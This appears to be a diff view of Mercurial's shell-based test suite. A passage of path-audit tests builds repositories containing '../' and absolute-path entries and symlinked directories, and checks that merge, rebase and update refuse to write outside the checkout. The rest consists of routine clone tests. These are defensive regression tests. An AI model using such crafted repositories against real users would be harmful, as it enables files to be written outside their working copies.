115 attack ../test
116
116
117 $ hg manifest -r3
117 $ hg manifest -r3
118 ../test
118 ../test
119 $ hg update -Cr3
119 $ hg update -Cr3
120 abort: path contains illegal component: ../test (glob)
120 abort: path contains illegal component: ../test (glob)
121 [255]
121 [255]
122
122
123 attack /tmp/test
123 attack /tmp/test
124
124
125 $ hg manifest -r4
125 $ hg manifest -r4
126 /tmp/test
126 /tmp/test
127 $ hg update -Cr4
127 $ hg update -Cr4
128 abort: path contains illegal component: /tmp/test (glob)
128 abort: path contains illegal component: /tmp/test (glob)
129 [255]
129 [255]
130
130
131 $ cd ..
131 $ cd ..
132
133 Test symlink traversal on merge:
134 --------------------------------
135
136 #if symlink
137
138 set up symlink hell
139
140 $ mkdir merge-symlink-out
141 $ hg init merge-symlink
142 $ cd merge-symlink
143 $ touch base
144 $ hg commit -qAm base
145 $ ln -s ../merge-symlink-out a
146 $ hg commit -qAm 'symlink a -> ../merge-symlink-out'
147 $ hg up -q 0
148 $ mkdir a
149 $ touch a/poisoned
150 $ hg commit -qAm 'file a/poisoned'
151 $ hg log -G -T '{rev}: {desc}\n'
152 @ 2: file a/poisoned
153 |
154 | o 1: symlink a -> ../merge-symlink-out
155 |/
156 o 0: base
157
158
159 try trivial merge
160
161 $ hg up -qC 1
162 $ hg merge 2
163 abort: path 'a/poisoned' traverses symbolic link 'a'
164 [255]
165
166 try rebase onto other revision: cache of audited paths should be discarded,
167 and the rebase should fail (issue5628)
168
169 $ hg up -qC 2
170 $ hg rebase -s 2 -d 1 --config extensions.rebase=
171 rebasing 2:e73c21d6b244 "file a/poisoned" (tip)
172 abort: path 'a/poisoned' traverses symbolic link 'a'
173 [255]
174 $ ls ../merge-symlink-out
175
176 $ cd ..
177
178 Test symlink traversal on update:
179 ---------------------------------
180
181 $ mkdir update-symlink-out
182 $ hg init update-symlink
183 $ cd update-symlink
184 $ ln -s ../update-symlink-out a
185 $ hg commit -qAm 'symlink a -> ../update-symlink-out'
186 $ hg rm a
187 $ mkdir a && touch a/b
188 $ hg ci -qAm 'file a/b' a/b
189 $ hg up -qC 0
190 $ hg rm a
191 $ mkdir a && touch a/c
192 $ hg ci -qAm 'rm a, file a/c'
193 $ hg log -G -T '{rev}: {desc}\n'
194 @ 2: rm a, file a/c
195 |
196 | o 1: file a/b
197 |/
198 o 0: symlink a -> ../update-symlink-out
199
200
201 try linear update where symlink already exists:
202
203 $ hg up -qC 0
204 $ hg up 1
205 abort: path 'a/b' traverses symbolic link 'a'
206 [255]
207
208 try linear update including symlinked directory and its content: paths are
209 audited first by calculateupdates(), where no symlink is created so both
210 'a' and 'a/b' are taken as good paths. still applyupdates() should fail.
211
212 $ hg up -qC null
213 $ hg up 1
214 abort: path 'a/b' traverses symbolic link 'a'
215 [255]
216 $ ls ../update-symlink-out
217
218 try branch update replacing directory with symlink, and its content: the
219 path 'a' is audited as a directory first, which should be audited again as
220 a symlink.
221
222 $ rm -f a
223 $ hg up -qC 2
224 $ hg up 1
225 abort: path 'a/b' traverses symbolic link 'a'
226 [255]
227 $ ls ../update-symlink-out
228
229 $ cd ..
230
231 #endif
@@ -1,1099 +1,1162 b''
1 Prepare repo a:
1 Prepare repo a:
2
2
3 $ hg init a
3 $ hg init a
4 $ cd a
4 $ cd a
5 $ echo a > a
5 $ echo a > a
6 $ hg add a
6 $ hg add a
7 $ hg commit -m test
7 $ hg commit -m test
8 $ echo first line > b
8 $ echo first line > b
9 $ hg add b
9 $ hg add b
10
10
11 Create a non-inlined filelog:
11 Create a non-inlined filelog:
12
12
13 $ $PYTHON -c 'file("data1", "wb").write("".join("%s\n" % x for x in range(10000)))'
13 $ $PYTHON -c 'file("data1", "wb").write("".join("%s\n" % x for x in range(10000)))'
14 $ for j in 0 1 2 3 4 5 6 7 8 9; do
14 $ for j in 0 1 2 3 4 5 6 7 8 9; do
15 > cat data1 >> b
15 > cat data1 >> b
16 > hg commit -m test
16 > hg commit -m test
17 > done
17 > done
18
18
19 List files in store/data (should show a 'b.d'):
19 List files in store/data (should show a 'b.d'):
20
20
21 $ for i in .hg/store/data/*; do
21 $ for i in .hg/store/data/*; do
22 > echo $i
22 > echo $i
23 > done
23 > done
24 .hg/store/data/a.i
24 .hg/store/data/a.i
25 .hg/store/data/b.d
25 .hg/store/data/b.d
26 .hg/store/data/b.i
26 .hg/store/data/b.i
27
27
28 Trigger branchcache creation:
28 Trigger branchcache creation:
29
29
30 $ hg branches
30 $ hg branches
31 default 10:a7949464abda
31 default 10:a7949464abda
32 $ ls .hg/cache
32 $ ls .hg/cache
33 branch2-served
33 branch2-served
34 checkisexec (execbit !)
34 checkisexec (execbit !)
35 checklink (symlink !)
35 checklink (symlink !)
36 checklink-target (symlink !)
36 checklink-target (symlink !)
37 checknoexec (execbit !)
37 checknoexec (execbit !)
38 rbc-names-v1
38 rbc-names-v1
39 rbc-revs-v1
39 rbc-revs-v1
40
40
41 Default operation:
41 Default operation:
42
42
43 $ hg clone . ../b
43 $ hg clone . ../b
44 updating to branch default
44 updating to branch default
45 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
45 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
46 $ cd ../b
46 $ cd ../b
47
47
48 Ensure branchcache got copied over:
48 Ensure branchcache got copied over:
49
49
50 $ ls .hg/cache
50 $ ls .hg/cache
51 branch2-served
51 branch2-served
52 checkisexec (execbit !)
52 checkisexec (execbit !)
53 checklink (symlink !)
53 checklink (symlink !)
54 checklink-target (symlink !)
54 checklink-target (symlink !)
55 rbc-names-v1
55 rbc-names-v1
56 rbc-revs-v1
56 rbc-revs-v1
57
57
58 $ cat a
58 $ cat a
59 a
59 a
60 $ hg verify
60 $ hg verify
61 checking changesets
61 checking changesets
62 checking manifests
62 checking manifests
63 crosschecking files in changesets and manifests
63 crosschecking files in changesets and manifests
64 checking files
64 checking files
65 2 files, 11 changesets, 11 total revisions
65 2 files, 11 changesets, 11 total revisions
66
66
67 Invalid dest '' must abort:
67 Invalid dest '' must abort:
68
68
69 $ hg clone . ''
69 $ hg clone . ''
70 abort: empty destination path is not valid
70 abort: empty destination path is not valid
71 [255]
71 [255]
72
72
73 No update, with debug option:
73 No update, with debug option:
74
74
75 #if hardlink
75 #if hardlink
76 $ hg --debug clone -U . ../c --config progress.debug=true
76 $ hg --debug clone -U . ../c --config progress.debug=true
77 linking: 1
77 linking: 1
78 linking: 2
78 linking: 2
79 linking: 3
79 linking: 3
80 linking: 4
80 linking: 4
81 linking: 5
81 linking: 5
82 linking: 6
82 linking: 6
83 linking: 7
83 linking: 7
84 linking: 8
84 linking: 8
85 linked 8 files
85 linked 8 files
86 #else
86 #else
87 $ hg --debug clone -U . ../c --config progress.debug=true
87 $ hg --debug clone -U . ../c --config progress.debug=true
88 linking: 1
88 linking: 1
89 copying: 2
89 copying: 2
90 copying: 3
90 copying: 3
91 copying: 4
91 copying: 4
92 copying: 5
92 copying: 5
93 copying: 6
93 copying: 6
94 copying: 7
94 copying: 7
95 copying: 8
95 copying: 8
96 copied 8 files
96 copied 8 files
97 #endif
97 #endif
98 $ cd ../c
98 $ cd ../c
99
99
100 Ensure branchcache got copied over:
100 Ensure branchcache got copied over:
101
101
102 $ ls .hg/cache
102 $ ls .hg/cache
103 branch2-served
103 branch2-served
104 rbc-names-v1
104 rbc-names-v1
105 rbc-revs-v1
105 rbc-revs-v1
106
106
107 $ cat a 2>/dev/null || echo "a not present"
107 $ cat a 2>/dev/null || echo "a not present"
108 a not present
108 a not present
109 $ hg verify
109 $ hg verify
110 checking changesets
110 checking changesets
111 checking manifests
111 checking manifests
112 crosschecking files in changesets and manifests
112 crosschecking files in changesets and manifests
113 checking files
113 checking files
114 2 files, 11 changesets, 11 total revisions
114 2 files, 11 changesets, 11 total revisions
115
115
116 Default destination:
116 Default destination:
117
117
118 $ mkdir ../d
118 $ mkdir ../d
119 $ cd ../d
119 $ cd ../d
120 $ hg clone ../a
120 $ hg clone ../a
121 destination directory: a
121 destination directory: a
122 updating to branch default
122 updating to branch default
123 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
123 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
124 $ cd a
124 $ cd a
125 $ hg cat a
125 $ hg cat a
126 a
126 a
127 $ cd ../..
127 $ cd ../..
128
128
129 Check that we drop the 'file:' from the path before writing the .hgrc:
129 Check that we drop the 'file:' from the path before writing the .hgrc:
130
130
131 $ hg clone file:a e
131 $ hg clone file:a e
132 updating to branch default
132 updating to branch default
133 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
133 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
134 $ grep 'file:' e/.hg/hgrc
134 $ grep 'file:' e/.hg/hgrc
135 [1]
135 [1]
136
136
137 Check that path aliases are expanded:
137 Check that path aliases are expanded:
138
138
139 $ hg clone -q -U --config 'paths.foobar=a#0' foobar f
139 $ hg clone -q -U --config 'paths.foobar=a#0' foobar f
140 $ hg -R f showconfig paths.default
140 $ hg -R f showconfig paths.default
141 $TESTTMP/a#0 (glob)
141 $TESTTMP/a#0 (glob)
142
142
143 Use --pull:
143 Use --pull:
144
144
145 $ hg clone --pull a g
145 $ hg clone --pull a g
146 requesting all changes
146 requesting all changes
147 adding changesets
147 adding changesets
148 adding manifests
148 adding manifests
149 adding file changes
149 adding file changes
150 added 11 changesets with 11 changes to 2 files
150 added 11 changesets with 11 changes to 2 files
151 updating to branch default
151 updating to branch default
152 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
152 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
153 $ hg -R g verify
153 $ hg -R g verify
154 checking changesets
154 checking changesets
155 checking manifests
155 checking manifests
156 crosschecking files in changesets and manifests
156 crosschecking files in changesets and manifests
157 checking files
157 checking files
158 2 files, 11 changesets, 11 total revisions
158 2 files, 11 changesets, 11 total revisions
159
159
160 Invalid dest '' with --pull must abort (issue2528):
160 Invalid dest '' with --pull must abort (issue2528):
161
161
162 $ hg clone --pull a ''
162 $ hg clone --pull a ''
163 abort: empty destination path is not valid
163 abort: empty destination path is not valid
164 [255]
164 [255]
165
165
166 Clone to '.':
166 Clone to '.':
167
167
168 $ mkdir h
168 $ mkdir h
169 $ cd h
169 $ cd h
170 $ hg clone ../a .
170 $ hg clone ../a .
171 updating to branch default
171 updating to branch default
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
173 $ cd ..
173 $ cd ..
174
174
175
175
176 *** Tests for option -u ***
176 *** Tests for option -u ***
177
177
178 Adding some more history to repo a:
178 Adding some more history to repo a:
179
179
180 $ cd a
180 $ cd a
181 $ hg tag ref1
181 $ hg tag ref1
182 $ echo the quick brown fox >a
182 $ echo the quick brown fox >a
183 $ hg ci -m "hacked default"
183 $ hg ci -m "hacked default"
184 $ hg up ref1
184 $ hg up ref1
185 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
185 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
186 $ hg branch stable
186 $ hg branch stable
187 marked working directory as branch stable
187 marked working directory as branch stable
188 (branches are permanent and global, did you want a bookmark?)
188 (branches are permanent and global, did you want a bookmark?)
189 $ echo some text >a
189 $ echo some text >a
190 $ hg ci -m "starting branch stable"
190 $ hg ci -m "starting branch stable"
191 $ hg tag ref2
191 $ hg tag ref2
192 $ echo some more text >a
192 $ echo some more text >a
193 $ hg ci -m "another change for branch stable"
193 $ hg ci -m "another change for branch stable"
194 $ hg up ref2
194 $ hg up ref2
195 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
195 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
196 $ hg parents
196 $ hg parents
197 changeset: 13:e8ece76546a6
197 changeset: 13:e8ece76546a6
198 branch: stable
198 branch: stable
199 tag: ref2
199 tag: ref2
200 parent: 10:a7949464abda
200 parent: 10:a7949464abda
201 user: test
201 user: test
202 date: Thu Jan 01 00:00:00 1970 +0000
202 date: Thu Jan 01 00:00:00 1970 +0000
203 summary: starting branch stable
203 summary: starting branch stable
204
204
205
205
206 Repo a has two heads:
206 Repo a has two heads:
207
207
208 $ hg heads
208 $ hg heads
209 changeset: 15:0aae7cf88f0d
209 changeset: 15:0aae7cf88f0d
210 branch: stable
210 branch: stable
211 tag: tip
211 tag: tip
212 user: test
212 user: test
213 date: Thu Jan 01 00:00:00 1970 +0000
213 date: Thu Jan 01 00:00:00 1970 +0000
214 summary: another change for branch stable
214 summary: another change for branch stable
215
215
216 changeset: 12:f21241060d6a
216 changeset: 12:f21241060d6a
217 user: test
217 user: test
218 date: Thu Jan 01 00:00:00 1970 +0000
218 date: Thu Jan 01 00:00:00 1970 +0000
219 summary: hacked default
219 summary: hacked default
220
220
221
221
222 $ cd ..
222 $ cd ..
223
223
224
224
225 Testing --noupdate with --updaterev (must abort):
225 Testing --noupdate with --updaterev (must abort):
226
226
227 $ hg clone --noupdate --updaterev 1 a ua
227 $ hg clone --noupdate --updaterev 1 a ua
228 abort: cannot specify both --noupdate and --updaterev
228 abort: cannot specify both --noupdate and --updaterev
229 [255]
229 [255]
230
230
231
231
232 Testing clone -u:
232 Testing clone -u:
233
233
234 $ hg clone -u . a ua
234 $ hg clone -u . a ua
235 updating to branch stable
235 updating to branch stable
236 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
236 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
237
237
238 Repo ua has both heads:
238 Repo ua has both heads:
239
239
240 $ hg -R ua heads
240 $ hg -R ua heads
241 changeset: 15:0aae7cf88f0d
241 changeset: 15:0aae7cf88f0d
242 branch: stable
242 branch: stable
243 tag: tip
243 tag: tip
244 user: test
244 user: test
245 date: Thu Jan 01 00:00:00 1970 +0000
245 date: Thu Jan 01 00:00:00 1970 +0000
246 summary: another change for branch stable
246 summary: another change for branch stable
247
247
248 changeset: 12:f21241060d6a
248 changeset: 12:f21241060d6a
249 user: test
249 user: test
250 date: Thu Jan 01 00:00:00 1970 +0000
250 date: Thu Jan 01 00:00:00 1970 +0000
251 summary: hacked default
251 summary: hacked default
252
252
253
253
254 Same revision checked out in repo a and ua:
254 Same revision checked out in repo a and ua:
255
255
256 $ hg -R a parents --template "{node|short}\n"
256 $ hg -R a parents --template "{node|short}\n"
257 e8ece76546a6
257 e8ece76546a6
258 $ hg -R ua parents --template "{node|short}\n"
258 $ hg -R ua parents --template "{node|short}\n"
259 e8ece76546a6
259 e8ece76546a6
260
260
261 $ rm -r ua
261 $ rm -r ua
262
262
263
263
264 Testing clone --pull -u:
264 Testing clone --pull -u:
265
265
266 $ hg clone --pull -u . a ua
266 $ hg clone --pull -u . a ua
267 requesting all changes
267 requesting all changes
268 adding changesets
268 adding changesets
269 adding manifests
269 adding manifests
270 adding file changes
270 adding file changes
271 added 16 changesets with 16 changes to 3 files (+1 heads)
271 added 16 changesets with 16 changes to 3 files (+1 heads)
272 updating to branch stable
272 updating to branch stable
273 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
273 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
274
274
275 Repo ua has both heads:
275 Repo ua has both heads:
276
276
277 $ hg -R ua heads
277 $ hg -R ua heads
278 changeset: 15:0aae7cf88f0d
278 changeset: 15:0aae7cf88f0d
279 branch: stable
279 branch: stable
280 tag: tip
280 tag: tip
281 user: test
281 user: test
282 date: Thu Jan 01 00:00:00 1970 +0000
282 date: Thu Jan 01 00:00:00 1970 +0000
283 summary: another change for branch stable
283 summary: another change for branch stable
284
284
285 changeset: 12:f21241060d6a
285 changeset: 12:f21241060d6a
286 user: test
286 user: test
287 date: Thu Jan 01 00:00:00 1970 +0000
287 date: Thu Jan 01 00:00:00 1970 +0000
288 summary: hacked default
288 summary: hacked default
289
289
290
290
291 Same revision checked out in repo a and ua:
291 Same revision checked out in repo a and ua:
292
292
293 $ hg -R a parents --template "{node|short}\n"
293 $ hg -R a parents --template "{node|short}\n"
294 e8ece76546a6
294 e8ece76546a6
295 $ hg -R ua parents --template "{node|short}\n"
295 $ hg -R ua parents --template "{node|short}\n"
296 e8ece76546a6
296 e8ece76546a6
297
297
298 $ rm -r ua
298 $ rm -r ua
299
299
300
300
301 Testing clone -u <branch>:
301 Testing clone -u <branch>:
302
302
303 $ hg clone -u stable a ua
303 $ hg clone -u stable a ua
304 updating to branch stable
304 updating to branch stable
305 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
305 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
306
306
307 Repo ua has both heads:
307 Repo ua has both heads:
308
308
309 $ hg -R ua heads
309 $ hg -R ua heads
310 changeset: 15:0aae7cf88f0d
310 changeset: 15:0aae7cf88f0d
311 branch: stable
311 branch: stable
312 tag: tip
312 tag: tip
313 user: test
313 user: test
314 date: Thu Jan 01 00:00:00 1970 +0000
314 date: Thu Jan 01 00:00:00 1970 +0000
315 summary: another change for branch stable
315 summary: another change for branch stable
316
316
317 changeset: 12:f21241060d6a
317 changeset: 12:f21241060d6a
318 user: test
318 user: test
319 date: Thu Jan 01 00:00:00 1970 +0000
319 date: Thu Jan 01 00:00:00 1970 +0000
320 summary: hacked default
320 summary: hacked default
321
321
322
322
323 Branch 'stable' is checked out:
323 Branch 'stable' is checked out:
324
324
325 $ hg -R ua parents
325 $ hg -R ua parents
326 changeset: 15:0aae7cf88f0d
326 changeset: 15:0aae7cf88f0d
327 branch: stable
327 branch: stable
328 tag: tip
328 tag: tip
329 user: test
329 user: test
330 date: Thu Jan 01 00:00:00 1970 +0000
330 date: Thu Jan 01 00:00:00 1970 +0000
331 summary: another change for branch stable
331 summary: another change for branch stable
332
332
333
333
334 $ rm -r ua
334 $ rm -r ua
335
335
336
336
337 Testing default checkout:
337 Testing default checkout:
338
338
339 $ hg clone a ua
339 $ hg clone a ua
340 updating to branch default
340 updating to branch default
341 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
341 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
342
342
343 Repo ua has both heads:
343 Repo ua has both heads:
344
344
345 $ hg -R ua heads
345 $ hg -R ua heads
346 changeset: 15:0aae7cf88f0d
346 changeset: 15:0aae7cf88f0d
347 branch: stable
347 branch: stable
348 tag: tip
348 tag: tip
349 user: test
349 user: test
350 date: Thu Jan 01 00:00:00 1970 +0000
350 date: Thu Jan 01 00:00:00 1970 +0000
351 summary: another change for branch stable
351 summary: another change for branch stable
352
352
353 changeset: 12:f21241060d6a
353 changeset: 12:f21241060d6a
354 user: test
354 user: test
355 date: Thu Jan 01 00:00:00 1970 +0000
355 date: Thu Jan 01 00:00:00 1970 +0000
356 summary: hacked default
356 summary: hacked default
357
357
358
358
359 Branch 'default' is checked out:
359 Branch 'default' is checked out:
360
360
361 $ hg -R ua parents
361 $ hg -R ua parents
362 changeset: 12:f21241060d6a
362 changeset: 12:f21241060d6a
363 user: test
363 user: test
364 date: Thu Jan 01 00:00:00 1970 +0000
364 date: Thu Jan 01 00:00:00 1970 +0000
365 summary: hacked default
365 summary: hacked default
366
366
367 Test clone with a branch named "@" (issue3677)
367 Test clone with a branch named "@" (issue3677)
368
368
369 $ hg -R ua branch @
369 $ hg -R ua branch @
370 marked working directory as branch @
370 marked working directory as branch @
371 $ hg -R ua commit -m 'created branch @'
371 $ hg -R ua commit -m 'created branch @'
372 $ hg clone ua atbranch
372 $ hg clone ua atbranch
373 updating to branch default
373 updating to branch default
374 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
374 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
375 $ hg -R atbranch heads
375 $ hg -R atbranch heads
376 changeset: 16:798b6d97153e
376 changeset: 16:798b6d97153e
377 branch: @
377 branch: @
378 tag: tip
378 tag: tip
379 parent: 12:f21241060d6a
379 parent: 12:f21241060d6a
380 user: test
380 user: test
381 date: Thu Jan 01 00:00:00 1970 +0000
381 date: Thu Jan 01 00:00:00 1970 +0000
382 summary: created branch @
382 summary: created branch @
383
383
384 changeset: 15:0aae7cf88f0d
384 changeset: 15:0aae7cf88f0d
385 branch: stable
385 branch: stable
386 user: test
386 user: test
387 date: Thu Jan 01 00:00:00 1970 +0000
387 date: Thu Jan 01 00:00:00 1970 +0000
388 summary: another change for branch stable
388 summary: another change for branch stable
389
389
390 changeset: 12:f21241060d6a
390 changeset: 12:f21241060d6a
391 user: test
391 user: test
392 date: Thu Jan 01 00:00:00 1970 +0000
392 date: Thu Jan 01 00:00:00 1970 +0000
393 summary: hacked default
393 summary: hacked default
394
394
395 $ hg -R atbranch parents
395 $ hg -R atbranch parents
396 changeset: 12:f21241060d6a
396 changeset: 12:f21241060d6a
397 user: test
397 user: test
398 date: Thu Jan 01 00:00:00 1970 +0000
398 date: Thu Jan 01 00:00:00 1970 +0000
399 summary: hacked default
399 summary: hacked default
400
400
401
401
402 $ rm -r ua atbranch
402 $ rm -r ua atbranch
403
403
404
404
405 Testing #<branch>:
405 Testing #<branch>:
406
406
407 $ hg clone -u . a#stable ua
407 $ hg clone -u . a#stable ua
408 adding changesets
408 adding changesets
409 adding manifests
409 adding manifests
410 adding file changes
410 adding file changes
411 added 14 changesets with 14 changes to 3 files
411 added 14 changesets with 14 changes to 3 files
412 updating to branch stable
412 updating to branch stable
413 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
413 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
414
414
415 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
415 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
416
416
417 $ hg -R ua heads
417 $ hg -R ua heads
418 changeset: 13:0aae7cf88f0d
418 changeset: 13:0aae7cf88f0d
419 branch: stable
419 branch: stable
420 tag: tip
420 tag: tip
421 user: test
421 user: test
422 date: Thu Jan 01 00:00:00 1970 +0000
422 date: Thu Jan 01 00:00:00 1970 +0000
423 summary: another change for branch stable
423 summary: another change for branch stable
424
424
425 changeset: 10:a7949464abda
425 changeset: 10:a7949464abda
426 user: test
426 user: test
427 date: Thu Jan 01 00:00:00 1970 +0000
427 date: Thu Jan 01 00:00:00 1970 +0000
428 summary: test
428 summary: test
429
429
430
430
431 Same revision checked out in repo a and ua:
431 Same revision checked out in repo a and ua:
432
432
433 $ hg -R a parents --template "{node|short}\n"
433 $ hg -R a parents --template "{node|short}\n"
434 e8ece76546a6
434 e8ece76546a6
435 $ hg -R ua parents --template "{node|short}\n"
435 $ hg -R ua parents --template "{node|short}\n"
436 e8ece76546a6
436 e8ece76546a6
437
437
438 $ rm -r ua
438 $ rm -r ua
439
439
440
440
441 Testing -u -r <branch>:
441 Testing -u -r <branch>:
442
442
443 $ hg clone -u . -r stable a ua
443 $ hg clone -u . -r stable a ua
444 adding changesets
444 adding changesets
445 adding manifests
445 adding manifests
446 adding file changes
446 adding file changes
447 added 14 changesets with 14 changes to 3 files
447 added 14 changesets with 14 changes to 3 files
448 updating to branch stable
448 updating to branch stable
449 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
449 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
450
450
451 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
451 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
452
452
453 $ hg -R ua heads
453 $ hg -R ua heads
454 changeset: 13:0aae7cf88f0d
454 changeset: 13:0aae7cf88f0d
455 branch: stable
455 branch: stable
456 tag: tip
456 tag: tip
457 user: test
457 user: test
458 date: Thu Jan 01 00:00:00 1970 +0000
458 date: Thu Jan 01 00:00:00 1970 +0000
459 summary: another change for branch stable
459 summary: another change for branch stable
460
460
461 changeset: 10:a7949464abda
461 changeset: 10:a7949464abda
462 user: test
462 user: test
463 date: Thu Jan 01 00:00:00 1970 +0000
463 date: Thu Jan 01 00:00:00 1970 +0000
464 summary: test
464 summary: test
465
465
466
466
467 Same revision checked out in repo a and ua:
467 Same revision checked out in repo a and ua:
468
468
469 $ hg -R a parents --template "{node|short}\n"
469 $ hg -R a parents --template "{node|short}\n"
470 e8ece76546a6
470 e8ece76546a6
471 $ hg -R ua parents --template "{node|short}\n"
471 $ hg -R ua parents --template "{node|short}\n"
472 e8ece76546a6
472 e8ece76546a6
473
473
474 $ rm -r ua
474 $ rm -r ua
475
475
476
476
477 Testing -r <branch>:
477 Testing -r <branch>:
478
478
479 $ hg clone -r stable a ua
479 $ hg clone -r stable a ua
480 adding changesets
480 adding changesets
481 adding manifests
481 adding manifests
482 adding file changes
482 adding file changes
483 added 14 changesets with 14 changes to 3 files
483 added 14 changesets with 14 changes to 3 files
484 updating to branch stable
484 updating to branch stable
485 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
485 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
486
486
487 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
487 Repo ua has branch 'stable' and 'default' (was changed in fd511e9eeea6):
488
488
489 $ hg -R ua heads
489 $ hg -R ua heads
490 changeset: 13:0aae7cf88f0d
490 changeset: 13:0aae7cf88f0d
491 branch: stable
491 branch: stable
492 tag: tip
492 tag: tip
493 user: test
493 user: test
494 date: Thu Jan 01 00:00:00 1970 +0000
494 date: Thu Jan 01 00:00:00 1970 +0000
495 summary: another change for branch stable
495 summary: another change for branch stable
496
496
497 changeset: 10:a7949464abda
497 changeset: 10:a7949464abda
498 user: test
498 user: test
499 date: Thu Jan 01 00:00:00 1970 +0000
499 date: Thu Jan 01 00:00:00 1970 +0000
500 summary: test
500 summary: test
501
501
502
502
503 Branch 'stable' is checked out:
503 Branch 'stable' is checked out:
504
504
505 $ hg -R ua parents
505 $ hg -R ua parents
506 changeset: 13:0aae7cf88f0d
506 changeset: 13:0aae7cf88f0d
507 branch: stable
507 branch: stable
508 tag: tip
508 tag: tip
509 user: test
509 user: test
510 date: Thu Jan 01 00:00:00 1970 +0000
510 date: Thu Jan 01 00:00:00 1970 +0000
511 summary: another change for branch stable
511 summary: another change for branch stable
512
512
513
513
514 $ rm -r ua
514 $ rm -r ua
515
515
516
516
517 Issue2267: Error in 1.6 hg.py: TypeError: 'NoneType' object is not
517 Issue2267: Error in 1.6 hg.py: TypeError: 'NoneType' object is not
518 iterable in addbranchrevs()
518 iterable in addbranchrevs()
519
519
520 $ cat <<EOF > simpleclone.py
520 $ cat <<EOF > simpleclone.py
521 > from mercurial import ui, hg
521 > from mercurial import ui, hg
522 > myui = ui.ui.load()
522 > myui = ui.ui.load()
523 > repo = hg.repository(myui, 'a')
523 > repo = hg.repository(myui, 'a')
524 > hg.clone(myui, {}, repo, dest="ua")
524 > hg.clone(myui, {}, repo, dest="ua")
525 > EOF
525 > EOF
526
526
527 $ $PYTHON simpleclone.py
527 $ $PYTHON simpleclone.py
528 updating to branch default
528 updating to branch default
529 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
529 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
530
530
531 $ rm -r ua
531 $ rm -r ua
532
532
533 $ cat <<EOF > branchclone.py
533 $ cat <<EOF > branchclone.py
534 > from mercurial import ui, hg, extensions
534 > from mercurial import ui, hg, extensions
535 > myui = ui.ui.load()
535 > myui = ui.ui.load()
536 > extensions.loadall(myui)
536 > extensions.loadall(myui)
537 > repo = hg.repository(myui, 'a')
537 > repo = hg.repository(myui, 'a')
538 > hg.clone(myui, {}, repo, dest="ua", branch=["stable",])
538 > hg.clone(myui, {}, repo, dest="ua", branch=["stable",])
539 > EOF
539 > EOF
540
540
541 $ $PYTHON branchclone.py
541 $ $PYTHON branchclone.py
542 adding changesets
542 adding changesets
543 adding manifests
543 adding manifests
544 adding file changes
544 adding file changes
545 added 14 changesets with 14 changes to 3 files
545 added 14 changesets with 14 changes to 3 files
546 updating to branch stable
546 updating to branch stable
547 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
547 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
548 $ rm -r ua
548 $ rm -r ua
549
549
550
550
551 Test clone with special '@' bookmark:
551 Test clone with special '@' bookmark:
552 $ cd a
552 $ cd a
553 $ hg bookmark -r a7949464abda @ # branch point of stable from default
553 $ hg bookmark -r a7949464abda @ # branch point of stable from default
554 $ hg clone . ../i
554 $ hg clone . ../i
555 updating to bookmark @
555 updating to bookmark @
556 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
556 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
557 $ hg id -i ../i
557 $ hg id -i ../i
558 a7949464abda
558 a7949464abda
559 $ rm -r ../i
559 $ rm -r ../i
560
560
561 $ hg bookmark -f -r stable @
561 $ hg bookmark -f -r stable @
562 $ hg bookmarks
562 $ hg bookmarks
563 @ 15:0aae7cf88f0d
563 @ 15:0aae7cf88f0d
564 $ hg clone . ../i
564 $ hg clone . ../i
565 updating to bookmark @ on branch stable
565 updating to bookmark @ on branch stable
566 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
566 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
567 $ hg id -i ../i
567 $ hg id -i ../i
568 0aae7cf88f0d
568 0aae7cf88f0d
569 $ cd "$TESTTMP"
569 $ cd "$TESTTMP"
570
570
571
571
572 Testing failures:
572 Testing failures:
573
573
574 $ mkdir fail
574 $ mkdir fail
575 $ cd fail
575 $ cd fail
576
576
577 No local source
577 No local source
578
578
579 $ hg clone a b
579 $ hg clone a b
580 abort: repository a not found!
580 abort: repository a not found!
581 [255]
581 [255]
582
582
583 No remote source
583 No remote source
584
584
585 #if windows
585 #if windows
586 $ hg clone http://$LOCALIP:3121/a b
586 $ hg clone http://$LOCALIP:3121/a b
587 abort: error: * (glob)
587 abort: error: * (glob)
588 [255]
588 [255]
589 #else
589 #else
590 $ hg clone http://$LOCALIP:3121/a b
590 $ hg clone http://$LOCALIP:3121/a b
591 abort: error: *refused* (glob)
591 abort: error: *refused* (glob)
592 [255]
592 [255]
